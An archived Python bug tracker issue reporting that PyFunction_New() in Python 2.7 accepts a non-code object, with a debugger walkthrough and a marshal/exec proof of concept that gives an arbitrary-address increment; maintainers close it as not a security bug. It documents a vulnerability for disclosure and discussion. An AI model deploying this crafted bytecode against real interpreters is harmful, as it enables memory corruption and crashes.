This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

classification
Title: PyFunction_New() not validate code object
Type: security Stage: resolved
Components: Interpreter Core Versions: Python 2.7
process
Status: closed Resolution: wont fix
Dependencies: Superseder:
Assigned To: Nosy List: JelleZijlstra, LCatro, serhiy.storchaka
Priority: normal Keywords:

Created on 2017-03-16 08:47 by LCatro, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Files
File name Uploaded Description Edit
inc_by_one.rar LCatro, 2017-03-16 08:47 poc and crash detail
Messages (4)
msg289710 - (view) Author: (LCatro) Date: 2017-03-16 08:47
PyFunction_New() not validate code object ,so we can make a string object to fake code object

This is Python ByteCode :

  LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41'
  MAKE_FUNCTION 0

in source code ,we can see that string object trace to variant v

TARGET(MAKE_FUNCTION)
{
    v = POP(); /* code object */  <=  now it is a string object
    x = PyFunction_New(v, f->f_globals);  <=  using in there

and than ,we making a string object will taking into PyFunction_New()

PyFunction_New(PyObject *code, PyObject *globals)
{
    PyFunctionObject *op = PyObject_GC_New(PyFunctionObject,
                                        &PyFunction_Type);
    static PyObject *__name__ = 0;
    if (op != NULL) {  <=  there just check new alloc object point but not checking the argument code's python type (actually it is TYPE_CODE) ..
        PyObject *doc;
        PyObject *consts;
        PyObject *module;
        op->func_weakreflist = NULL;
        Py_INCREF(code);
        op->func_code = code;
        Py_INCREF(globals);
        op->func_globals = globals;
        op->func_name = ((PyCodeObject *)code)->co_name;
        Py_INCREF(op->func_name);  <=  it will make an arbitrary address inc by one ..

Opcode MAKE_CLOSURE similar too ..

TARGET(MAKE_CLOSURE)
{
    v = POP(); /* code object */
    x = PyFunction_New(v, f->f_globals);

poc and crash detail in update file
msg289746 - (view) Author: Jelle Zijlstra (JelleZijlstra) * (Python committer) Date: 2017-03-17 07:00
I don't think this is a bug; it is known and expected that you can do all kinds of bad things by writing bytecode manually. (You can already make Python write to random memory by giving it LOAD_FAST or STORE_FAST opcodes with incorrect offsets.)

This doesn't seem to be clearly documented though; the documentation just says that bytecode can change between releases.
msg289749 - (view) Author: (LCatro) Date: 2017-03-17 08:56
actually ,LOAD_CONST is taking an correct offset .I make a Python opcode compiler ,LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41' will conver to LOAD_CONST 1 .look back the poc ,it mean :

LOAD_CONST 1     => Load a string object from co->consts to python stack
MAKE_FUNCTION 0  => first ,python core will pop a object from python stack ,and than using this object to create a function

so set a breakpoint at TARGET(MAKE_FUNCTION)

    v = POP(); /* code object */  <=  now it is a string object
    x = PyFunction_New(v, f->f_globals);

PyFunction_New(PyObject *code, PyObject *globals)  <=  now argument code is a string object not code object

    op->func_name = ((PyCodeObject *)code)->co_name;  <=  look there
    Py_INCREF(op->func_name)

conver to assembly :

1e07e24e 8b4834          mov     ecx,dword ptr [eax+34h]
...
1e07e254 ff01            inc     dword ptr [ecx]

it mean ,if control data struct's offset 0x34 and it will conduct an arbitrarily address to inc 

Python string object's struct like this :
|Python_Type|String_Length|String_Data|

breakpoint at 0x1e07e24e ,look eax ..

0:000> dd eax
0204d2e0  00000003 1e1d81f8 00000024 c7554b90
0204d2f0  00000001 43434343 43434343 43434343
0204d300  43434343 43434343 43434343 43434343
0204d310  43434343 41414141 68746100 00275f5f
0204d320  0204e408 0204d3e0 fffffffd ffffffff
0204d330  00000001 1e1dbb00 01fda968 01fe28a0
0204d340  0204b590 00000000 1e1d9824 01fb1760
0204d350  00000000 00000000 01feb2c0 01ff9930

so [eax+34h] point to 0x41414141 ,inc dword ptr [ecx] => inc dword ptr [0x41414141]

i trigger this need compiler opcode to .pyc ,actually we can still trigger in .py ,this is poc :

import marshal

code=b'\x63\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x73\x0A\x00\x00\x00\x64\x01\x00\x84\x00\x00\x64\x00\x00\x53\x28\x02\x00\x00\x00\x4E\x73\x24\x00\x00\x00\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x41\x41\x41\x41\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x74\x00\x00\x00\x00\x73\x08\x00\x00\x00\x3C\x6D\x6F\x64\x75\x6C\x65\x3E\x01\x00\x00\x00\x74\x02\x00\x00\x00\x00\x01'

poc=marshal.loads(code)

exec(poc)
msg289750 - (view) Author: Serhiy Storchaka (serhiy.storchaka) * (Python committer) Date: 2017-03-17 09:16
This is a deliberate decision. In general, it is very difficult to verify the bytecode for correctness (whatever correctness criterion has been chosen). Any check takes time and this will slow down the execution in the normal case. This is not considered security issue since passing untrusted bytecode is not safe in any case.
History
Date User Action Args
2022-04-11 14:58:44adminsetgithub: 74011
2017-03-17 09:16:32serhiy.storchakasetstatus: open -> closed

nosy: + serhiy.storchaka
messages: + msg289750

resolution: wont fix
stage: resolved
2017-03-17 08:56:17LCatrosetmessages: + msg289749
2017-03-17 07:00:29JelleZijlstrasetnosy: + JelleZijlstra
messages: + msg289746
2017-03-16 08:47:57LCatrocreate